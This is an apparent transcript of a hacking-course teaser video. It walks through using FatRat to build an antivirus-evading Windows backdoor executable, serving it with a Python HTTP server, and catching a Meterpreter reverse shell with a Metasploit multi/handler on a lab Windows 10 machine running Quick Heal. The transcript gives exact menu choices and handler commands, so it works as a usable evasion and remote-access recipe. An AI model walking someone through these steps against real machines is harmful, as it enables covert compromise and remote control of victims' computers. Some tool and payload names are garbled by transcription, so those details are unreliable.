teaser, bypass antivirus in Windows 10 and hack Windows 10 completely. Now in this video we are going to take a look, first of all, information about the teaser and then how you can perform exploitation that we are going to learn here. So this is just a teaser video, so you need to worry about it because we will cover everything in the later sections. So you just need to sit back and relax and watch this video. We already have an antivirus available inside our Windows machine, which is Quick Heal Antivirus. So you should also download and install Quick Heal Antivirus trial version. Alright, so now let me show you that how we can create an undetectable payload or a virus inside Kali Linux operating system. Then we will send this inside Windows 10 machine. Then I will show you that how we can completely pen test Windows 10. Here I'm going to use FatRat to create undetectable virus. You can also use Whalemaster, but you can use any one. So I'm using FatRat. We have already downloaded FatRat, so you can click on places, you can click on downloads, and inside downloads you will find out the FatRat master. So do one thing, right click here, open in terminal. Let me zoom it for you. Alright, now you can type ls, list all the files, and you can open this folder, cd space, paste here, type ls. Now you can find here FatRat, here it is. So you just need to type here FatRat to start it and hit enter. So now FatRat will check all the dependencies inside your Kali Linux, and if your Kali Linux is fully updated, then FatRat will automatically open and will provide you a menu, right? So it's quite easy. You can also start FatRat directly if you have created a shortcut. Otherwise you can use this method that I have showed you here. Now it is checking all the dependencies. Here it is. So FatRat is now open. Please press enter key to continue, so hit enter, and again it is asking press enter key to continue, so again hit enter, and you are here at the menu. So I'm going to use number 6, create FUD backdoor 1000% with Ponwinds. So I'm going to use this one because this is in excellent condition. Let me try with the 6th one. So you can type here number 6, hit enter. Alright, now I can try the 3rd one, create exe file. I can create an exe file with Apache and PowerShell. So let me try with the 3rd one. So you can try 3, hit enter. It is asking the localhost IP address, right? So again you can right click here, open a new window, and you can check it again. Type ifconfig, hit enter. This is your IP address 192.168. You can also find here, you can type here 192.168.0.7, hit enter. You need to provide a L port, so my L port is 5555, hit enter. Please enter a file name, so you can type, for example, file 15, hit enter. So what kind of method you want to use? I will try the 3rd one, windows/mutator/reverse_tcp. So you can try the 3rd one, hit enter, and now it will use these details and it will create an undetectable payload for us. So when it will create the payload, then we will send it to Windows 10 machine, and where Quick Heal Internet Security Antivirus is already installed. So we will check that if this payload is detectable or undetectable inside Windows 10 machine, and then if it is undetectable, then it means that we have successfully bypassed Quick Heal Antivirus inside Windows 10 machine, and then we will try to access the directories inside Windows 10. So now it is taking time, right? Meanwhile, what you can do, you can start a new window. Inside that new window you can start a Metasploit, because Metasploit is necessary to create a handler. So we need to create a handler as well. So let me do one thing, let me open a new window, and inside that new window I will start Metasploit. Now it is starting. Here it is. Let me zoom it. Yeah. So here in this window, I can start Metasploit by typing MSF console and hit enter. So I will also create a handler, right, so that we can handle requests coming from the victim machine. So you can simply minimize it. And here it is trying to create that payload, taking some time, using our personal info and creating exe with Apache and PowerShell. So guys, you can see here that backdoor saved in the output folder, and let me check if it is there or not. So you can click on places, and you can click on downloads. Inside downloads, inside the FATWet master, and here you can find the output folder. Here it is. Double click here, and file 15 will be, yeah, here it is. So this is file 15.exe, and we have successfully created this payload. Now we need to send this payload inside Windows 10 machine, which is our victim, and we need to check that if Quick Heal Internet Security Antivirus can detect it or not. So we can transfer it by using Python server. So to start Python server, you can simply click right here and click open in terminal, minimize it. You can also minimize this, and let me zoom it for you. Yeah, and here you can start the Python server. To start Python server, you can type python -m and simple http server and hit enter. Python server is running on port number 8000. Let me go back to the Windows 10 machine and let me download that payload. So you can open Mozilla Firefox or Internet Explorer, anyone you can start, right? And here you need to type the IP address of Kali Linux. So the IP address of Kali Linux is 192.168.0.7 and then colon 8000. So you can type here 192.168.0.7 colon 8000 and hit enter. Now it will try to access the directories of Kali Linux operating system. We just need to wait here. Here it is. So you can see here that I'm able to access the directories. Here I need to download file15.exe. Here it is. File15.exe is available here. So you can simply click on file15.exe and download it inside your system. Here it is. Click save and it will be saved. So guys, you can see here that inside the downloads folder of Windows 10 machine, file15.exe has been downloaded, and you can see here that Quick Heal Internet Security is already installed inside Windows 10, but Quick Heal Internet Security is not able to detect it, right? Otherwise it will automatically remove this file. Great. Now let me go back to the Kali Linux operating system. Here you can close the Python server because we have already transferred, and here you can see the Metasploit is already open. Minimize this. In Metasploit we need to start the handler, so you can type here use exploit/multi/handler. After that you can provide the payload, set payload Windows/meterpreter/reverse_TCP. Hit enter. Then you can type set lhost, which is your Kali Linux IP address 192.168.0.7. I think this is the right IP address. Here it is. Port number is 5555. Hit enter. Set lport 5555, and you can type exploit here. Hit enter. Go back to the Windows 10 machine and double click on that file15.exe. Hit enter. Go back to the Windows 10 machine, just double click on this file and run this file inside Windows 10. This is just a warning message. Click more info and click run anyway. So here it is executing inside Windows 10 machine. I hope we will get a connection between Windows 10 and Kali Linux operating system in Metasploit. So you can go back to the Kali Linux operating system, and here you can see that Meterpreter session has been opened. So we have successfully hacked Windows 10 machine. We have successfully bypassed antivirus inside Windows 10 machine. In the next video, we are going to learn about ethical hacking latest terminologies. Thank you.